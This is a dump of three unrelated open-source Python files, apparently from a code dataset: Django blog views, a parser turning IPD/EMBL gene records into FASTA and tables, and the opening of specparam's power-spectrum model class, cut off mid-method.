        posts = Blog.objects.published().public()
        last_year = None
        for post in posts:
            if post.publish_time.year != last_year:
                post.year = post.publish_time.year
                last_year = post.year
        return posts
class BlogListView(BasePostListView):
    """
    Front page: paginated list of all published, public posts.
    """
    template_name = 'index.html'
    # NOTE(review): class-level queryset; Django querysets are lazy, so this
    # is presumably re-evaluated per request by ListView — confirm.
    queryset = Blog.objects.published().public()
class BlogsWithCategoryView(BasePostListView):
    """Posts belonging to one category (pk taken from the URL)."""

    template_name = 'category.html'

    def get_queryset(self):
        category_pk = self.kwargs['pk']
        return Blog.objects.published().public().filter(category__id=category_pk)

    def get_context_data(self, **kwargs):
        context = super(BlogsWithCategoryView, self).get_context_data(**kwargs)
        context['page'] = {'category': self.kwargs['cat_name'],
                           'url': self.request.path}
        return context
class BlogsWithTagView(BasePostListView):
    """Posts carrying one tag (tag name taken from the URL)."""

    template_name = "tag.html"

    def get_queryset(self):
        tag_name = self.kwargs['tag_name']
        return Blog.objects.published().public().filter(tags__title=tag_name)

    def get_context_data(self, **kwargs):
        context = super(BlogsWithTagView, self).get_context_data(**kwargs)
        context['page'] = {'tag': self.kwargs['tag_name'],
                           'url': self.request.path}
        return context
class BlogDetailView(DetailView):
    """Single post page: validates the slug, enforces visibility rules,
    bumps the view counter and provides prev/next navigation."""

    model = Blog
    template_name = "post.html"
    context_object_name = "post"

    def get_object(self, queryset=None):
        blog = super(BlogDetailView, self).get_object(queryset)
        # The URL must carry the post's own slug, otherwise 404.
        if blog.link != self.kwargs['blog_link']:
            raise Http404()
        # Drafts and private posts are visible to their author only.
        if blog.status == 'd' or (not blog.is_public and self.request.user != blog.author):
            raise PermissionDenied
        # Bump the view counter; modified=False presumably keeps the edit
        # timestamp untouched (custom argument of Blog.save) — confirm.
        blog.access_count += 1
        blog.save(modified=False)
        return blog

    def get_context_data(self, **kwargs):
        context = super(BlogDetailView, self).get_context_data(**kwargs)
        current_post = context.get("object")
        current_site = Site.objects.get_current()
        page = dict()
        page['comments'] = True
        page['title'] = current_post.title
        page['permalink'] = "http://" + current_site.domain + current_post.get_absolute_url()
        page['path'] = current_post.get_absolute_url
        context['page'] = page
        # Bug fix: both neighbour lookups shared one try block, so when the
        # previous-post query raised IndexError (i.e. on the oldest post)
        # the next-post query was silently skipped.  Look each neighbour up
        # independently instead.
        prev_post = None
        next_post = None
        try:
            prev_post = Blog.objects.filter(status='p', is_public=True, pk__lt=current_post.id).order_by('-pk')[0]
        except IndexError:
            pass
        try:
            next_post = Blog.objects.filter(status='p', is_public=True, pk__gt=current_post.id).order_by('pk')[0]
        except IndexError:
            pass
        context['next_post'] = next_post
        context['prev_post'] = prev_post
        return context
class LatestPosts(Feed):
    """Atom feed of the ten most recent published public posts."""
    from django.utils.feedgenerator import Atom1Feed
    feed_type = Atom1Feed
    title = "foofish 的笔录"
    link = "/"

    def items(self):
        recent = Blog.objects.filter(status='p', is_public=True)
        return recent.all().order_by('-publish_time')[:10]

    def item_title(self, item):
        return item.title

    def item_description(self, item):
        return item.snippet
| lzjun567/django_blog | apps/blog/views.py | views.py | py | 6,195 | python | en | code | 206 | github-code | 50 |
23924691708 | # extract useful information from the dat file
import re
import sys
def readMETA(str) :
    """Parse the header of one EMBL-style dat record.

    Returns a dict with the sequence ID, gene length, allele name,
    description, sequence type ("gene" when UTR/intron features exist,
    otherwise "CDS"), record type and the database release version.
    Missing fields default to "NA".
    """
    meta = {}
    # ID line carries the accession and the sequence length in BP.
    m = re.search(r'ID\s{3}(.*); SV \d+; standard; DNA; HUM; (\d+) BP.', str)
    if m:
        meta['ID'] = m.group(1)
        meta['genelength'] = m.group(2)
    else:
        meta['ID'] = "NA"
        meta['genelength'] = "NA"
    # DE line: "<allele>, <description>".
    m = re.search(r'DE\s{3}(.*), (.*)\n', str)
    if m:
        meta['allele'] = m.group(1)
        meta['description'] = m.group(2)
    else:
        meta['allele'] = "NA"
        meta['description'] = "NA"
    # A record with UTR or intron features covers genomic sequence;
    # otherwise only the coding sequence is present.
    has_utr = re.search(r'FT\s*UTR', str)
    has_intron = re.search(r'FT\s*intron', str)
    meta['seqtype'] = "gene" if (has_utr or has_intron) else "CDS"
    # Records carrying a /translation qualifier describe a real gene.
    # (sic: "unkown" kept for downstream compatibility)
    meta['type'] = "gene" if re.search(r'FT\s*/translation="', str) else "unkown"
    m = re.search(r'CC\s*(.*) Release Version (.*)\n', str)
    meta['version'] = (m.group(1) + '-V' + m.group(2)) if m else "NA"
    return meta
def readGENE(str) :
    """Extract feature annotations from the FT section of one dat record.

    Returns a dict with CDS interval strings ("a..b"), the codon start
    offset, UTR intervals, exon tuples (range, number, pseudo-marker),
    intron tuples (range, number) and the gene name ("NA" if absent).
    """
    info = {}
    # CDS intervals: every "a..b" range between "CDS" and "codon_start".
    cds_span = re.search(r'CDS\s*.*codon_start', str, re.DOTALL)
    info['CDS'] = re.findall(r'(\d*\.\.\d*)', cds_span.group()) if cds_span else None
    m = re.search(r'/codon_start=(\d*)\n', str)
    info['codon_start'] = m.group(1) if m else None
    info['UTR'] = re.findall(r'UTR\s*(\d*\.\.\d*)\n', str)
    # exon tuples: (range, exon number, "/pseudo" marker or '').
    info['exon'] = re.findall(
        r'exon\s*(\d*\.\.\d*)\nFT\s*/number="(\d*)"\n(FT\s*/pseudo)?', str)
    info['intron'] = re.findall(r'intron\s*(\d*\.\.\d*)\nFT\s*/number="(\d*)"\n', str)
    m = re.search(r'/gene="(.*)"\n', str)
    info['gene'] = m.group(1) if m else "NA"
    return info
def readGENESeq(str) :
    """Return the nucleotide sequence from the SQ section.

    Whitespace and position digits are stripped and the sequence is
    upper-cased; "NA" when no SQ block is found.
    """
    out = {}
    m = re.search(r'\nSQ.*\n((\s*.*\n)*)//', str)
    if m:
        out['geneSeq'] = re.sub(r'\s|\d', '', m.group(1)).upper()
    else:
        out['geneSeq'] = "NA"
    return out
def readPROTEIN(str) :
    """Return the amino-acid sequence from the /translation qualifier.

    Bug fix: the original ran ``re.sub('FT|"|\\n|\\s', ...)`` on the whole
    qualifier, which also deleted every "FT" pair occurring INSIDE the
    protein (phenylalanine followed by threonine), corrupting such
    sequences.  Only the leading FT field tag of each continuation line
    is removed now; quotes and whitespace are stripped as before.
    """
    out = {}
    m = re.search(r'translation=(.*\n(FT\s{19}.*\n)*)', str)
    if m:
        seq = re.sub(r'^FT', '', m.group(1), flags=re.M)  # drop line tags only
        out['protein'] = re.sub(r'["\s]', '', seq)
    else:
        out['protein'] = "NA"
    return out
def writeSTDOUTprotein(df) :
    """Print one FASTA record to stdout, wrapped at 60 chars per line.

    The header is ">allele ID description length" with spaces in the
    description replaced by underscores.
    """
    seq = df['protein']
    header = ">{} {} {} {}\n".format(
        df['allele'], df['ID'], df['description'].replace(' ', '_'), len(seq))
    sys.stdout.write(header)
    # wrap the sequence at 60 characters per line
    for start in range(0, (len(seq) // 60 + 1) * 60, 60):
        sys.stdout.write(seq[start:start + 60] + '\n')
def writeSTDOUTgeneRecordsFirstline() :
    """Print the tab-separated header row of the gene-record table."""
    columns = ['gene', 'ID', 'allele', 'description', 'codon_start',
               'element', 'index', 'from', 'to']
    sys.stdout.write("\t".join(columns) + '\n')
def writeSTDOUTgeneRecords(df) :
    """Print one tab-separated table row per feature of a record.

    Emits a whole-gene row (index 0, range 1..genelength) followed by one
    row per CDS, UTR and exon interval.  Bails out (returns None) when
    any of the identifying fields is missing or empty.
    """
    if not (df['gene'] and df['ID'] and df['allele']
            and df['description'] and df['codon_start']):
        return None
    prefix = "\t".join([df['gene'], df['ID'], df['allele'],
                        df['description'], df['codon_start']])
    # whole-gene row
    sys.stdout.write(prefix + "\tgene\t0\t1\t" + df['genelength'] + '\n')
    cds = df['CDS']
    if cds:
        for idx, rng in enumerate(cds, start=1):
            sys.stdout.write(prefix + "\tCDS\t" + str(idx) + "\t"
                             + rng.replace('..', "\t") + '\n')
    utr = df['UTR']
    if utr:
        for idx, rng in enumerate(utr, start=1):
            sys.stdout.write(prefix + "\tUTR\t" + str(idx) + "\t"
                             + rng.replace('..', "\t") + '\n')
    exons = df['exon']
    if exons:
        # exon entries carry their own number in position 1
        for entry in exons:
            sys.stdout.write(prefix + "\texon\t" + entry[1] + "\t"
                             + entry[0].replace('..', "\t") + '\n')
def writeSTDOUTgeneElement(df) :
    """Write a one-line, tab-separated summary of all gene elements to stdout.

    Builds a single 'key=value' record covering gene range, codon shift,
    start/stop codons, CDS, UTR, exon (with UTRs merged into flanking exons)
    and intron splice-site dinucleotides, then writes it to stdout.
    Returns None (and writes nothing) when any identifying field is missing.

    NOTE(review): if df['CDS'] is None/empty, the `for x in cds` loop below
    still runs (TypeError on None) or leaves cdsArr empty (IndexError at
    `cdsArr[shift - 1]`) -- presumably callers only pass records with a CDS;
    confirm before relying on this for CDS-less records.
    """
    if df['gene'] and df['ID'] and df['allele'] \
       and df['description'] and df['codon_start'] :
        pref = "gene=" + df['gene'] + "\t" +\
            "version=" + df['version'] + "\t" +\
            "ID=" + df['ID'] + "\t" +\
            "allele=" + df['allele'] + "\t" +\
            "description=" + df['description'].replace(' ', '_') + "\t" +\
            "type=" + df['type']
    else :
        return None
    ostr = ''
    # output gene
    ostr = pref + "\t" + "geneRange=" + "1.." + df['genelength']
    # output CDS
    cds = df['CDS']
    if cds:
        cdsstr = ",".join(cds)
    else :
        cdsstr = "NA"
    ## search for start codon and end codon
    # Expand all CDS ranges into a sorted list of 1-based positions
    cdsArr = []
    for x in cds :
        a, b = x.split("..")
        for y in range(int(a), int(b)+1) : cdsArr.append(y)
    cdsArr.sort()
    n = len(cdsArr)
    # codon_start gives the 1-based reading-frame offset into the CDS
    shift = int(df['codon_start'])
    nCodon = (n - shift + 1)// 3
    firstCodon = cdsArr[shift - 1 ]
    lastCodon = cdsArr[shift -1 + (nCodon - 1) * 3]
    #print([len(cdsArr), firstCodon, lastCodon])
    seq = df["geneSeq"]
    # Codons are read directly off the gene sequence (1-based coordinates)
    startCodon = seq[firstCodon-1:firstCodon+2]
    stopCodon = seq[lastCodon-1:lastCodon+2]
    # for the case that the stop codon is not included in the CDS:
    # peek at the next in-frame triplet just past the annotated CDS end
    if not stopCodon in ["TAA", "TAG", "TGA"] and lastCodon+5 <= len(seq) :
        tmp = seq[lastCodon+2:lastCodon+5]
        if len(tmp) == 3 and tmp in ["TAA", "TAG", "TGA"] :
            stopCodon = tmp
            lastCodon = lastCodon + 3
    # output UTR and exon
    utr = df['UTR']
    utrArr = []
    if utr:
        utrstr = ",".join(utr)
        for u in utr :
            a, b = u.split("..")
            utrArr.append([int(a), int(b)])
    else :
        utrstr = "NA"
    exon = df['exon']
    nexon = 0
    if exon:
        nexon = len(exon)
        exonstr = []
        for i in range(nexon) :
            lst = list(exon[i])
            # Any non-empty third field marks the exon as a pseudo-exon
            if lst[2] != '' : lst[2] = "pseudo"
            if utr:
                # merge UTR into exon: a UTR directly abutting an exon
                # boundary extends that exon's range
                c, d = lst[0].split("..")
                c = int(c)
                d = int(d)
                rmv = []
                for x in utrArr :
                    a, b = x
                    #print(a,b, c, d)
                    if c == b + 1 :
                        c = a
                        rmv.append(x)
                    elif c > b+1 :
                        break
                    if d == a -1 :
                        d = b
                        rmv.append(x)
                    elif d < a-1:
                        break
                    #print(a,b, c, d)
                # Consumed UTRs are removed so they are not re-used or re-emitted
                for x in rmv : utrArr.remove(x)
                lst[0] = str(c) + ".." + str(d)
            exonstr.append(lst[2] + lst[1] + ":" + lst[0])
        if len(utrArr) > 0 :
            # turn unmerged UTR into new exon
            for c, d in utrArr:
                exonstr.append("utr:" + str(c) + ".." + str(d))
        exonstr = ",".join(exonstr)
    intron = df['intron']
    if intron:
        # Collect the unique donor-acceptor dinucleotide pairs (e.g. GT-AG)
        intronstr = []
        for i in intron :
            a, b = i[0].split("..")
            a = int(a)
            b = int(b)
            l = seq[a - 1 : a + 1]
            r = seq[b - 2 : b ]
            x = l + "-" + r
            if not x in intronstr :
                intronstr.append(x)
        intronstr.sort()
        intronstr = ",".join(intronstr)
    else :
        intronstr = "NA"
    # A "good template" needs a UTR on both sides (exactly two UTR entries)
    goodtemplate = False
    c1 = len(utrstr.split(",")) == 2 # UTR to UTR
    #c2 = startCodon == "ATG" and stopCodon in ["TAA", "TAG", "TGA"]
    c2 = True #startCodon == "ATG" and stopCodon in ["TAA", "TAG", "TGA"]
    if c1 and c2 :
        goodtemplate = True
        exonArr = []
        for x in exon :
            a, b = x[0].split("..")
            for y in range(int(a), int(b)+1) : exonArr.append(y)
        exonArr.sort()
        # NOTE(review): the trailing `and False` disables this consistency
        # warning entirely -- presumably left over from debugging
        if len(exonArr) != len(cdsArr) and "pseudo" not in exonstr and False:
            sys.stderr.write(df['ID'] + ": CDS not euqals to Exon\n")
            sys.stderr.write("CDS = " + cdsstr + "\n")
            sys.stderr.write("Exon = " + exonstr + "\n")
    # Assemble the final record, one key=value field per element
    ostr = ostr + "\t" + "goodTemplate=" + str(goodtemplate)
    ostr = ostr + "\t" + "codonShift=" + df['codon_start']
    ostr = ostr + "\t" + "startCodon=" + startCodon + ":"
    ostr = ostr + str(firstCodon) + ".." + str(firstCodon+2)
    ostr = ostr + "\t" + "stopCodon=" + stopCodon + ":"
    ostr = ostr + str(lastCodon) + ".." + str(lastCodon+2)
    ostr = ostr + "\t" + "CDS=" + cdsstr
    ostr = ostr + "\t" + "UTR=" + utrstr
    ostr = ostr + "\t" + "nexon=" + str(nexon)
    ostr = ostr + "\t" + "exon=" + exonstr
    ostr = ostr + "\t" + "intron=" + intronstr
    ostr = ostr + "\n"
    sys.stdout.write(ostr)
def writeSTDOUTalleleName(df) :
    """Print a one-line summary (gene, allele, ID, description, length) for named genes."""
    if df['gene'] == "NA" :
        return
    parts = [df['gene'], df['allele'], df['ID'],
             df['description'].replace(' ', '_'),
             str(df['genelength']) + 'bp']
    sys.stdout.write(" ".join(parts) + '\n')
def writeSTDOUTgeneseq(df) :
    """Write the gene sequence to stdout in FASTA format (80 columns).

    Only acts on records whose 'seqtype' is "gene"; otherwise writes nothing.
    """
    if df['seqtype'] != "gene" :
        return
    s = df['geneSeq']
    headline = ">" + df['allele'] + " " + df['ID'] + " " \
             + df['description'].replace(' ', '_') + " " \
             + str(df['genelength']) + 'bp\n'
    sys.stdout.write(headline)
    # Step by the line width, avoiding the extra blank line the old loop
    # emitted when len(s) is an exact multiple of 80
    for i in range(0, len(s), 80) :
        sys.stdout.write(s[i : i + 80] + '\n')
def writeSTDOUTcds(df, verbose) :
    """Assemble the CDS from the gene sequence and write it as FASTA (80 columns).

    Parameters
    ----------
    df : dict
        Record with 'geneSeq', 'CDS' (list of 'a..b' ranges or None),
        'allele', 'ID' and 'codon_start' fields.
    verbose : bool
        If True, report skipped (CDS-less) records on stderr.
    """
    seq = df['geneSeq']
    if df['CDS'] is None :
        if verbose:
            sys.stderr.write(' <msg> CDS is missing for ' + df['ID'] + ", skip\n")
        return None
    # Splice the CDS segments out of the gene sequence.
    # Ranges are 1-based, inclusive 'a..b' strings; split on the literal
    # '..' rather than the old regex r'(\d*)..(\d*)', whose unescaped dots
    # and empty-match groups made it fragile.
    pieces = []
    for rng in df['CDS'] :
        a, b = rng.split('..')
        pieces.append(seq[int(a) - 1 : int(b)])
    cds = ''.join(pieces)
    headline = ">" + df['allele'] + " " + df['ID'] + " " \
             + "frame=" + df['codon_start'] + " " + str(len(cds)) + 'bp\n'
    sys.stdout.write(headline)
    # Step by the line width, avoiding the extra blank line the old loop
    # emitted when len(cds) is an exact multiple of 80
    for i in range(0, len(cds), 80) :
        sys.stdout.write(cds[i : i + 80] + '\n')
| YingZhou001/Immuannot | scripts/scripts/easyipd/IPDtools.py | IPDtools.py | py | 11,239 | python | en | code | 3 | github-code | 50 |
33742333601 | """Base model object, which defines the power spectrum model.
Private Attributes
==================
Private attributes of the model object are documented here.
Data Attributes
---------------
_spectrum_flat : 1d array
Flattened power spectrum, with the aperiodic component removed.
_spectrum_peak_rm : 1d array
Power spectrum, with peaks removed.
Model Component Attributes
--------------------------
_ap_fit : 1d array
Values of the isolated aperiodic fit.
_peak_fit : 1d array
Values of the isolated peak fit.
Internal Settings Attributes
----------------------------
_ap_percentile_thresh : float
Percentile threshold for finding peaks above the aperiodic component.
_ap_guess : list of [float, float, float]
Guess parameters for fitting the aperiodic component.
_ap_bounds : tuple of tuple of float
Upper and lower bounds on fitting aperiodic component.
_cf_bound : float
Parameter bounds for center frequency when fitting gaussians.
_bw_std_edge : float
Bandwidth threshold for edge rejection of peaks, in units of gaussian standard deviation.
_gauss_overlap_thresh : float
Degree of overlap (in units of standard deviation) between gaussian guesses to drop one.
_gauss_std_limits : list of [float, float]
Peak width limits, converted to use for gaussian standard deviation parameter.
This attribute is computed based on `peak_width_limits` and should not be updated directly.
_maxfev : int
The maximum number of calls to the curve fitting function.
_error_metric : str
The error metric to use for post-hoc measures of model fit error.
Run Modes
---------
_debug : bool
Whether the object is set in debug mode.
This should be controlled by using the `set_debug_mode` method.
_check_data, _check_freqs : bool
Whether to check added inputs for incorrect inputs, failing if present.
Frequency data is checked for linear spacing.
Power values are checked for data for NaN or Inf values.
These modes default to True, and can be controlled with the `set_check_modes` method.
Code Notes
----------
Methods without defined docstrings import docs at runtime, from aliased external functions.
"""
import warnings
from copy import deepcopy
import numpy as np
from numpy.linalg import LinAlgError
from scipy.optimize import curve_fit
from specparam.core.utils import unlog
from specparam.core.items import OBJ_DESC
from specparam.core.info import get_indices
from specparam.core.io import save_model, load_json
from specparam.core.reports import save_model_report
from specparam.core.modutils import copy_doc_func_to_method
from specparam.core.utils import group_three, check_array_dim
from specparam.core.funcs import gaussian_function, get_ap_func, infer_ap_func
from specparam.core.jacobians import jacobian_gauss
from specparam.core.errors import (FitError, NoModelError, DataError,
NoDataError, InconsistentDataError)
from specparam.core.strings import (gen_settings_str, gen_model_results_str,
gen_issue_str, gen_width_warning_str)
from specparam.plts.model import plot_model
from specparam.utils.data import trim_spectrum
from specparam.utils.params import compute_gauss_std
from specparam.data import FitResults, ModelRunModes, ModelSettings, SpectrumMetaData
from specparam.data.conversions import model_to_dataframe
from specparam.sim.gen import gen_freqs, gen_aperiodic, gen_periodic, gen_model
###################################################################################################
###################################################################################################
class SpectralModel():
"""Model a power spectrum as a combination of aperiodic and periodic components.
WARNING: frequency and power values inputs must be in linear space.
Passing in logged frequencies and/or power spectra is not detected,
and will silently produce incorrect results.
Parameters
----------
peak_width_limits : tuple of (float, float), optional, default: (0.5, 12.0)
Limits on possible peak width, in Hz, as (lower_bound, upper_bound).
max_n_peaks : int, optional, default: inf
Maximum number of peaks to fit.
min_peak_height : float, optional, default: 0
Absolute threshold for detecting peaks.
This threshold is defined in absolute units of the power spectrum (log power).
peak_threshold : float, optional, default: 2.0
Relative threshold for detecting peaks.
This threshold is defined in relative units of the power spectrum (standard deviation).
aperiodic_mode : {'fixed', 'knee'}
Which approach to take for fitting the aperiodic component.
verbose : bool, optional, default: True
Verbosity mode. If True, prints out warnings and general status updates.
Attributes
----------
freqs : 1d array
Frequency values for the power spectrum.
power_spectrum : 1d array
Power values, stored internally in log10 scale.
freq_range : list of [float, float]
Frequency range of the power spectrum, as [lowest_freq, highest_freq].
freq_res : float
Frequency resolution of the power spectrum.
modeled_spectrum_ : 1d array
The full model fit of the power spectrum, in log10 scale.
aperiodic_params_ : 1d array
Parameters that define the aperiodic fit. As [Offset, (Knee), Exponent].
The knee parameter is only included if aperiodic component is fit with a knee.
peak_params_ : 2d array
Fitted parameter values for the peaks. Each row is a peak, as [CF, PW, BW].
gaussian_params_ : 2d array
Parameters that define the gaussian fit(s).
Each row is a gaussian, as [mean, height, standard deviation].
r_squared_ : float
R-squared of the fit between the input power spectrum and the full model fit.
error_ : float
Error of the full model fit.
n_peaks_ : int
The number of peaks fit in the model.
has_data : bool
Whether data is loaded to the object.
has_model : bool
Whether model results are available in the object.
Notes
-----
- Commonly used abbreviations used in this module include:
CF: center frequency, PW: power, BW: Bandwidth, AP: aperiodic
- Input power spectra must be provided in linear scale.
Internally they are stored in log10 scale, as this is what the model operates upon.
- Input power spectra should be smooth, as overly noisy power spectra may lead to bad fits.
For example, raw FFT inputs are not appropriate. Where possible and appropriate, use
longer time segments for power spectrum calculation to get smoother power spectra,
as this will give better model fits.
- The gaussian params are those that define the gaussian of the fit, where as the peak
params are a modified version, in which the CF of the peak is the mean of the gaussian,
the PW of the peak is the height of the gaussian over and above the aperiodic component,
and the BW of the peak, is 2*std of the gaussian (as 'two sided' bandwidth).
"""
# pylint: disable=attribute-defined-outside-init
    def __init__(self, peak_width_limits=(0.5, 12.0), max_n_peaks=np.inf, min_peak_height=0.0,
                 peak_threshold=2.0, aperiodic_mode='fixed', verbose=True):
        """Initialize model object.

        Stores the public settings given at construction, sets the private
        fitting / run-mode settings to their documented defaults, and
        initializes all data & results attributes to their empty states.
        """
        # Set input settings
        self.peak_width_limits = peak_width_limits
        self.max_n_peaks = max_n_peaks
        self.min_peak_height = min_peak_height
        self.peak_threshold = peak_threshold
        self.aperiodic_mode = aperiodic_mode
        self.verbose = verbose
        ## PRIVATE SETTINGS
        # Percentile threshold, to select points from a flat spectrum for an initial aperiodic fit
        # Points are selected at a low percentile value to restrict to non-peak points
        self._ap_percentile_thresh = 0.025
        # Guess parameters for aperiodic fitting, [offset, knee, exponent]
        # If offset guess is None, the first value of the power spectrum is used as offset guess
        # If exponent guess is None, the abs(log-log slope) of first & last points is used
        self._ap_guess = (None, 0, None)
        # Bounds for aperiodic fitting, as: ((offset_low_bound, knee_low_bound, exp_low_bound),
        #                                    (offset_high_bound, knee_high_bound, exp_high_bound))
        # By default, aperiodic fitting is unbound, but can be restricted here
        # Even if fitting without knee, leave bounds for knee (they are dropped later)
        self._ap_bounds = ((-np.inf, -np.inf, -np.inf), (np.inf, np.inf, np.inf))
        # Threshold for how far a peak has to be from edge to keep.
        # This is defined in units of gaussian standard deviation
        self._bw_std_edge = 1.0
        # Degree of overlap between gaussians for one to be dropped
        # This is defined in units of gaussian standard deviation
        self._gauss_overlap_thresh = 0.75
        # Parameter bounds for center frequency when fitting gaussians, in terms of +/- std dev
        self._cf_bound = 1.5
        # The error metric to calculate, post model fitting. See `_calc_error` for options
        # Note: this is for checking error post fitting, not an objective function for fitting
        self._error_metric = 'MAE'
        ## PRIVATE CURVE_FIT SETTINGS
        # The maximum number of calls to the curve fitting function
        self._maxfev = 5000
        # The tolerance setting for curve fitting (see scipy.curve_fit - ftol / xtol / gtol)
        # Here reduce tolerance to speed fitting. Set value to 1e-8 to match curve_fit default
        self._tol = 0.00001
        ## RUN MODES
        # Set default debug mode - controls if an error is raised if model fitting is unsuccessful
        self._debug = False
        # Set default data checking modes - controls which checks get run on input data
        # check_freqs: checks the frequency values, and raises an error for uneven spacing
        self._check_freqs = True
        # check_data: checks the power values and raises an error for any NaN / Inf values
        self._check_data = True
        # Set internal settings, based on inputs, and initialize data & results attributes
        self._reset_internal_settings()
        self._reset_data_results(True, True, True)
@property
def has_data(self):
"""Indicator for if the object contains data."""
return True if np.any(self.power_spectrum) else False
@property
def has_model(self):
"""Indicator for if the object contains a model fit.
Notes
-----
This check uses the aperiodic params, which are:
- nan if no model has been fit
- necessarily defined, as floats, if model has been fit
"""
return True if not np.all(np.isnan(self.aperiodic_params_)) else False
@property
def n_peaks_(self):
"""How many peaks were fit in the model."""
return self.peak_params_.shape[0] if self.has_model else None
def _reset_internal_settings(self):
"""Set, or reset, internal settings, based on what is provided in init.
Notes
-----
These settings are for internal use, based on what is provided to, or set in `__init__`.
They should not be altered by the user.
"""
# Only update these settings if other relevant settings are available
if self.peak_width_limits:
# Bandwidth limits are given in 2-sided peak bandwidth
# Convert to gaussian std parameter limits
self._gauss_std_limits = tuple(bwl / 2 for bwl in self.peak_width_limits)
# Otherwise, assume settings are unknown (have been cleared) and set to None
else:
self._gauss_std_limits = None
def _reset_data_results(self, clear_freqs=False, clear_spectrum=False, clear_results=False):
"""Set, or reset, data & results attributes to empty.
Parameters
----------
clear_freqs : bool, optional, default: False
Whether to clear frequency attributes.
clear_spectrum : bool, optional, default: False
Whether to clear power spectrum attribute.
clear_results : bool, optional, default: False
Whether to clear model results attributes.
"""
if clear_freqs:
self.freqs = None
self.freq_range = None
self.freq_res = None
if clear_spectrum:
self.power_spectrum = None
if clear_results:
self.aperiodic_params_ = np.array([np.nan] * \
(2 if self.aperiodic_mode == 'fixed' else 3))
self.gaussian_params_ = np.empty([0, 3])
self.peak_params_ = np.empty([0, 3])
self.r_squared_ = np.nan
self.error_ = np.nan
self.modeled_spectrum_ = None
self._spectrum_flat = None
self._spectrum_peak_rm = None
self._ap_fit = None
self._peak_fit = None
def add_data(self, freqs, power_spectrum, freq_range=None, clear_results=True):
"""Add data (frequencies, and power spectrum values) to the current object.
Parameters
----------
freqs : 1d array
Frequency values for the power spectrum, in linear space.
power_spectrum : 1d array
Power spectrum values, which must be input in linear space.
freq_range : list of [float, float], optional
Frequency range to restrict power spectrum to.
If not provided, keeps the entire range.
clear_results : bool, optional, default: True
Whether to clear prior results, if any are present in the object.
This should only be set to False if data for the current results are being re-added.
Notes
-----
If called on an object with existing data and/or results
they will be cleared by this method call.
"""
# If any data is already present, then clear previous data
# Also clear results, if present, unless indicated not to
# This is to ensure object consistency of all data & results
self._reset_data_results(clear_freqs=self.has_data,
clear_spectrum=self.has_data,
clear_results=self.has_model and clear_results)
self.freqs, self.power_spectrum, self.freq_range, self.freq_res = \
self._prepare_data(freqs, power_spectrum, freq_range, 1)
def add_settings(self, settings):
"""Add settings into object from a ModelSettings object.
Parameters
----------
settings : ModelSettings
A data object containing the settings for a power spectrum model.
"""
for setting in OBJ_DESC['settings']:
setattr(self, setting, getattr(settings, setting))
self._check_loaded_settings(settings._asdict())
def add_meta_data(self, meta_data):
"""Add data information into object from a SpectrumMetaData object.
Parameters
----------
meta_data : SpectrumMetaData
A meta data object containing meta data information.
"""
for meta_dat in OBJ_DESC['meta_data']:
setattr(self, meta_dat, getattr(meta_data, meta_dat))
self._regenerate_freqs()
def add_results(self, results):
"""Add results data into object from a FitResults object.
Parameters
----------
results : FitResults
A data object containing the results from fitting a power spectrum model.
"""
self.aperiodic_params_ = results.aperiodic_params
self.gaussian_params_ = results.gaussian_params
self.peak_params_ = results.peak_params
self.r_squared_ = results.r_squared
self.error_ = results.error
self._check_loaded_results(results._asdict())
    def report(self, freqs=None, power_spectrum=None, freq_range=None,
               plt_log=False, plot_full_range=False, **plot_kwargs):
        """Run model fit, and display a report, which includes a plot, and printed results.
        Parameters
        ----------
        freqs : 1d array, optional
            Frequency values for the power spectrum.
        power_spectrum : 1d array, optional
            Power values, which must be input in linear space.
        freq_range : list of [float, float], optional
            Frequency range to fit the model to.
            If not provided, fits across the entire given range.
        plt_log : bool, optional, default: False
            Whether or not to plot the frequency axis in log space.
        plot_full_range : bool, default: False
            If True, plots the full range of the given power spectrum.
            Only relevant / effective if `freqs` and `power_spectrum` passed in in this call.
        **plot_kwargs
            Keyword arguments to pass into the plot method.
            Plot options with a name conflict be passed by pre-pending `plot_`.
            e.g. `freqs`, `power_spectrum` and `freq_range`.
        Notes
        -----
        Data is optional, if data has already been added to the object.
        """
        self.fit(freqs, power_spectrum, freq_range)
        # `freqs` / `power_spectrum` / `freq_range` overrides for the plot are
        # passed with a `plot_` prefix and popped out of the kwargs here, so
        # they do not collide with the fit arguments of the same name
        self.plot(plt_log=plt_log,
                  freqs=freqs if plot_full_range else plot_kwargs.pop('plot_freqs', None),
                  power_spectrum=power_spectrum if \
                      plot_full_range else plot_kwargs.pop('plot_power_spectrum', None),
                  freq_range=plot_kwargs.pop('plot_freq_range', None),
                  **plot_kwargs)
        self.print_results(concise=False)
    def fit(self, freqs=None, power_spectrum=None, freq_range=None):
        """Fit the full power spectrum as a combination of periodic and aperiodic components.
        Parameters
        ----------
        freqs : 1d array, optional
            Frequency values for the power spectrum, in linear space.
        power_spectrum : 1d array, optional
            Power values, which must be input in linear space.
        freq_range : list of [float, float], optional
            Frequency range to restrict power spectrum to.
            If not provided, keeps the entire range.
        Raises
        ------
        NoDataError
            If no data is available to fit.
        FitError
            If model fitting fails to fit. Only raised in debug mode.
        Notes
        -----
        Data is optional, if data has already been added to the object.
        Fitting runs in two passes: an initial aperiodic fit is used to isolate
        and fit the peaks, then the aperiodic component is re-fit on the
        peak-removed spectrum for the final parameters.
        """
        # If freqs & power_spectrum provided together, add data to object.
        if freqs is not None and power_spectrum is not None:
            self.add_data(freqs, power_spectrum, freq_range)
        # If power spectrum provided alone, add to object, and use existing frequency data
        # Note: be careful passing in power_spectrum data like this:
        #   It assumes the power_spectrum is already logged, with correct freq_range
        elif isinstance(power_spectrum, np.ndarray):
            self.power_spectrum = power_spectrum
        # Check that data is available
        if not self.has_data:
            raise NoDataError("No data available to fit, can not proceed.")
        # Check and warn about width limits (if in verbose mode)
        if self.verbose:
            self._check_width_limits()
        # In rare cases, the model fails to fit, and so uses try / except
        try:
            # If not set to fail on NaN or Inf data at add time, check data here
            #   This serves as a catch all for curve_fits which will fail given NaN or Inf
            #   Because FitError's are by default caught, this allows fitting to continue
            if not self._check_data:
                if np.any(np.isinf(self.power_spectrum)) or np.any(np.isnan(self.power_spectrum)):
                    raise FitError("Model fitting was skipped because there are NaN or Inf "
                                   "values in the data, which preclude model fitting.")
            # Pass 1: fit the aperiodic component
            self.aperiodic_params_ = self._robust_ap_fit(self.freqs, self.power_spectrum)
            self._ap_fit = gen_aperiodic(self.freqs, self.aperiodic_params_)
            # Flatten the power spectrum using fit aperiodic fit
            self._spectrum_flat = self.power_spectrum - self._ap_fit
            # Find peaks on the flattened residual, and fit them with gaussians
            self.gaussian_params_ = self._fit_peaks(np.copy(self._spectrum_flat))
